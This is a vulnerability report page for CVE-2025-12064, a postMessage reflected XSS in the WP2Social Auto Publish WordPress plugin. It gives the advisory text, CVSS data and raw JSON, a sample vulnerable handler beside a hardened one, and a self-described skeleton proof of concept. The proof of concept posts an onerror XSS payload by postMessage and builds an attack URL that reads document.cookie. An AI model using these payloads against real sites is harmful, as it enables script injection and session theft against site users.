Security Vulnerability Report
CVE-2025-12064 CVSS 6.1 MEDIUM

CVE-2025-12064

Published: 2025-11-08 04:15:44
Last Modified: 2026-04-15 00:35:42

Description

The WP2Social Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. In a postMessage-based reflected XSS the vulnerable page's message event listener writes attacker-controlled event.data into the DOM without checking event.origin or escaping the value, so any page that can obtain a window reference to it (by opening it with window.open or framing it) can deliver the payload; the advisory does not state which page of the plugin carries the listener.
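The pattern the description refers to, as an added example that is not the plugin's code (the actual handler is not reproduced on this page): a message listener that reflects event.data into the page with no origin check and no escaping, beside a hardened version that allow-lists the sender origin, validates the message shape and escapes before rendering. The function names, the {action, data} message shape and the origins are assumptions for illustration.

```javascript
// Added example, not code from the WP2Social Auto Publish plugin.
// Shows the vulnerable postMessage pattern (CWE-79 via event.data) and the
// hardened form. Function names, message shape and origins are assumptions.

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// VULNERABLE pattern: whatever any window sends is rendered as HTML.
// Returns the markup that the handler would assign to element.innerHTML.
function renderMessageVulnerable(event) {
  const msg = event.data;
  // No check of event.origin: any page holding a reference to this window
  // (opener, parent frame) can post to it.
  // No escaping: '<img src=x onerror=...>' in msg.data becomes live markup.
  return '<div class="status">' + msg.data + '</div>';
}

// HARDENED pattern: allow-list the sender origin, validate the message shape
// and escape before rendering (or assign to textContent instead of innerHTML).
function renderMessageHardened(event, allowedOrigin) {
  if (event.origin !== allowedOrigin) return null;          // drop foreign senders
  const msg = event.data;
  if (!msg || typeof msg !== 'object' || typeof msg.data !== 'string') return null;
  if (msg.action !== 'status') return null;                 // only the expected action
  return '<div class="status">' + escapeHtml(msg.data) + '</div>';
}

// Constructed sample event (not captured traffic): the PoC-style payload
// arriving from an attacker-controlled origin.
const SAMPLE_ATTACK_EVENT = {
  origin: 'https://attacker.example',
  data: { action: 'status', data: '<img src=x onerror="alert(1)">' },
};

// Run both handlers against the sample event and return what each would render.
function demo() {
  const site = 'https://victim.example';
  return {
    vulnerable: renderMessageVulnerable(SAMPLE_ATTACK_EVENT),
    hardenedForeign: renderMessageHardened(SAMPLE_ATTACK_EVENT, site),
    hardenedSameOrigin: renderMessageHardened(
      Object.assign({}, SAMPLE_ATTACK_EVENT, { origin: site }), site),
    hardenedWrongAction: renderMessageHardened(
      { origin: site, data: { action: 'other', data: 'x' } }, site),
  };
}

// Browser wiring (assumed element id):
//   window.addEventListener('message', function (e) {
//     var html = renderMessageHardened(e, window.location.origin);
//     if (html !== null) document.getElementById('status').innerHTML = html;
//   });

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The origin check is the part most often missing: escaping alone stops markup injection, but a listener that accepts messages from any origin still lets an attacker drive whatever action the message triggers. Check event.origin against an exact allow-list, never with a substring or prefix match.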

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

WP2Social Auto Publish (facebook-auto-publish) <= 2.4.7

No NVD CPE configuration data is available for this entry; the affected range above is taken from the description.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a skeleton rather than a working exploit: the message shape ({action, data}) is a placeholder, and the admin page slug and query parameter in the "attack URL" are not confirmed by the advisory or the linked changeset.
html
<!-- CVE-2025-12064 PoC: WP2Social Auto Publish XSS via PostMessage -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-12064 PoC</title>
</head>
<body>
  <h1>CVE-2025-12064 Reflected XSS PoC</h1>
  <p>Target: WordPress site with WP2Social Auto Publish plugin &lt;= 2.4.7</p>
  <script>
    // Malicious payload to be sent via postMessage
    var maliciousPayload = '<img src=x onerror="alert(String.fromCharCode(88,83,83,32,69,120,112,108,111,105,116,101,100));">';

    // The vulnerable plugin listens for postMessage without proper sanitization.
    // Target the window that opened this page, or the parent if this page is framed.
    var targetWindow = window.opener || window.parent;

    // Construct the attack message. The keys the real listener expects are not
    // documented on this page; 'some_action' is a placeholder.
    var attackMessage = { action: 'some_action', data: maliciousPayload };

    // Send the message (assuming the target has a listener). The original sketch
    // only logged this step; the call below actually posts it. '*' sends to any
    // target origin, which is acceptable for a PoC but never for legitimate code.
    console.log('Sending malicious PostMessage payload...');
    if (targetWindow && targetWindow !== window) {
      targetWindow.postMessage(attackMessage, '*');
    }

    // Alternative: direct injection via URL parameter (if reflected). The page
    // slug and parameter name are placeholders, not confirmed by the advisory.
    var maliciousUrl = 'http://target-wordpress-site.com/wp-admin/admin.php?page=wp2social-auto-publish&param="\x3e\x3cimg src=x onerror=alert(document.cookie)>';

    // Display instructions
    document.write('<p>To test this PoC:</p>');
    document.write('<ol>');
    document.write('<li>Ensure the target site has WP2Social Auto Publish plugin installed (version &lt;= 2.4.7)</li>');
    document.write('<li>Open the target WordPress site in another window</li>');
    document.write('<li>Click the link or trigger the PostMessage communication</li>');
    document.write('<li>The XSS payload should execute in the context of the target site</li>');
    document.write('</ol>');

    // Show the URL as text. document.write() of the raw string, as in the
    // original sketch, would execute the payload inside this PoC page itself.
    var urlNote = document.createElement('p');
    urlNote.textContent = 'Attack URL: ' + maliciousUrl;
    document.body.appendChild(urlNote);
  </script>
</body>
</html>

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386972%40facebook-auto-publish&new=3386972%40facebook-auto-publish&sfp_email=&sfph_mail= (plugin changeset 3386972 for facebook-auto-publish)
https://www.wordfence.com/threat-intel/vulnerabilities/id/32eb02b8-71cd-4cdb-aa9d-3fd1850fb126?source=cve (Wordfence vulnerability advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12064",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-08T04:15:44.117",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP2Social Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386972%40facebook-auto-publish&new=3386972%40facebook-auto-publish&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/32eb02b8-71cd-4cdb-aa9d-3fd1850fb126?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}